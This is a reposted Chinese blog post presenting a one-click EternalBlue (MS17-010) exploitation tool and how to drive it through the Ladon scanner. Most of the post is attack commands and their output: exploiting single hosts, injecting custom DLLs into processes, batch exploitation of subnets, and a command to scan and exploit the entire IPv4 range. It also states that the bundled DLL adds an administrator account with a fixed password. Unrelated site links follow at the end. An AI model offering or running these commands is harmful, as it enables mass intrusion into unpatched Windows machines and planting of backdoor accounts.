〖EXP〗NSA MS17010永恒之蓝一键工具

〖EXP〗NSA MS17010永恒之蓝一键工具漏洞简介永恒之蓝是指2017年4月14日晚,黑客团体ShadowBrokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。漏洞检测无损检测,不会对目标造成任何危害,大家无需担心Ladon192.168.1.8MS1701

大家好,又见面了,我是你们的朋友全栈君。

漏洞简介

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

漏洞检测

无损检测,不会对目标造成任何危害,大家无需担心

Ladon 192.168.1.8 MS17010
Ladon 192.168.1.8/24 MS17010
Ladon 192.168.1.8/c MS17010

检测发现存在漏洞高亮显示
image

独立使用

只需提供IP或IP列表即可自动利用永恒之蓝,当然也可以使用Ladon来批量甚至全网

PS: 由于当时漏洞影响很大,所以并未放出一键批量工具,现在4年过去了,还没打补丁就只能建议开除维护人员了,工具调用的是NSA原版的EXP,所以整个SMBSCAN目录里的文件基本上都是被杀的,这就不方便集成在Ladon里,以免Ladon被所有杀软杀。

C:\Users\k8gege\Desktop\SmbExp>ksmb 192.168.1.89
MS17010-EXP ETERNALBLUE by K8gege

IP:  192.168.1.89
OS:  64-bit 6.1 build 7601     Windows 2008 R2 Enterprise 7601 SP 1
VUL: 3 (ETERNALBLUE     - DANE  ETERNALROMANCE  - FB    ETERNALCHAMPION - DANE/F
B)
EXP: Use Eternalblue & Doublepulsar
DLL: x64 Payload Injected

只IP默认445端口

ksmb 192.168.1.89

自定义端口

ksmb 192.168.1.89 445
适用于代理出来打,不用考虑做免杀,而且免杀一堆文件也很麻烦

自定义DLL

ksmb 192.168.1.89 445 mydll.dll

注入指定进程

ksmb 192.168.1.89 445 mydll.dll explorer.exe

Ladon调用

使用Ladon可轻松批量使用自己的POC,即只需要实现一个功能,剩下交给Ladon,不用每次来什么新洞都得浪费时间写批量利用工具。除了花一堆时间调式EXP,还得把它弄成批量,批量又得考虑多线程是否兼容POC里的代码等等问题,等写完时效性都过了。Ladon可批量主机、批量URL、批量网段、全网等等,非常方便,下面就是调用ms17010exp的例子。

C:\Users\k8gege\Desktop\SmbExp>Ladon 192.168.1.89 ksmb.exe
Ladon 7.5
Start: 2020-12-17 23:40:16
Runtime: .net 2.0  ME: x64 OS: x64
OS Name: Microsoft Windows 8.1 Enterprise
RunUser: k8gege PR: -IsUser
PID: 5804  CurrentProcess: Ladon

Call DiyMoudle (c# exe)
load ksmb.exe
ICMP: 192.168.1.89      00-0C-29-CF-FE-E1       VMware
MS17010-EXP ETERNALBLUE by K8gege

IP:  192.168.1.89
OS:  64-bit 6.1 build 7601     Windows 2008 R2 Enterprise 7601 SP 1
VUL: 3 (ETERNALBLUE     - DANE  ETERNALROMANCE  - FB    ETERNALCHAMPION - DANE/F
B)
EXP: Use Eternalblue & Doublepulsar
DLL: x64 Payload Injected

批量利用

Ladon 192.168.1.89/c ksmb.exe
Ladon 192.168.1.89/24 ksmb.exe

全网扫描

Ladon 0.0.0.0-255.255.255.255 ksmb.exe

成功结果

自带DLL会添加以下管理员用户
k8ms17010exp K8gege520!@#

可替换DLL,执行自定义功能

image

下载

EXP小密圈内下载

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/130055.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
blank

相关推荐

  • 基尼系数的计算原理是什么_基尼系数1

    基尼系数的计算原理是什么_基尼系数1理论基尼指数( GiniIndex )是20世纪初经济学家基尼定义的指标,最为知名的应用是考察居民收入的差异情况。居民收入的情况符合幂指函数( PowerLaw )分布,最直观(但非准确)的理解就是 80/20 原则,也就是 20%的人拥有了 80% 的人的财富。用公式表示就是描述了是收入靠后 %x 的人所拥有的收入总和占所有人收入总和的比例 f(x) 的关系。

    2022年10月13日
  • Leetcode 5:最长回文子串(最详细的解法!!!)[通俗易懂]

    Leetcode 5:最长回文子串(最详细的解法!!!)[通俗易懂]给定一个字符串s,找到s中最长的回文子串。你可以假设s的最大长度为1000。示例1:输入:"babad"输出:"bab"注意:"aba"也是一个有效答案。示例2:输入:"cbbd"输出:"bb"解题思路首先最简单的做法就是暴力解法,通过二重循环确定子串的范围,然后

  • DB2 SQL存储过程语法

    DB2 SQL存储过程语法

  • c语言 背包算法,c语言背包问题(背包最大容量c语言算法)[通俗易懂]

    c语言 背包算法,c语言背包问题(背包最大容量c语言算法)[通俗易懂]求旅行者能获得的最大总价值。请用C语言编程下面是核心的代码(递归函数的代码)别的由你自己搞掂啦(在main函数中的实现,输入,输出的格式)s为一个背包可以放入的物品总重量.n为物品数,w[n]为物品重量.背包问题#includeintmax(intx,inty){if(x>=y)returnx;elsereturny;}intf(int*m,。1在代码风格上…

  • 思科交换机AAA认证

    思科交换机AAA认证aaanew-modelusernameadminprivilege15passwordadminaaaauthenticationlogindefaultgrouptacacs+localaaaauthorizationexecdefaultgrouptacacs+localaaaaccountingexecdefaultstar…

  • 少儿编程scratch 教程下载(少儿编程scratch 教程)

    少儿编程管理系统的设计和所有网站设计一样,都是基于web端内网和外网的开发,而这里使用的工具是PHP。这里的外网就是学生端,是对外公开的。供学生观看教学视频,写作业和提交作业,创作作品和分享作品使用。内网就是教师端,不对外公开。供教师管理学生账号(修改信息,添加或删除),班级,作业(批量设置评语,批量提交作业给家长等),管理/山川课程和备课。(可以上传教学视频,可以上传学生文件,编辑课程介绍和插图、课件等。)学生端教师端系统为SaaS源码:可以拥有永久使用,没有门店和用户数量限制,数据加密.

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号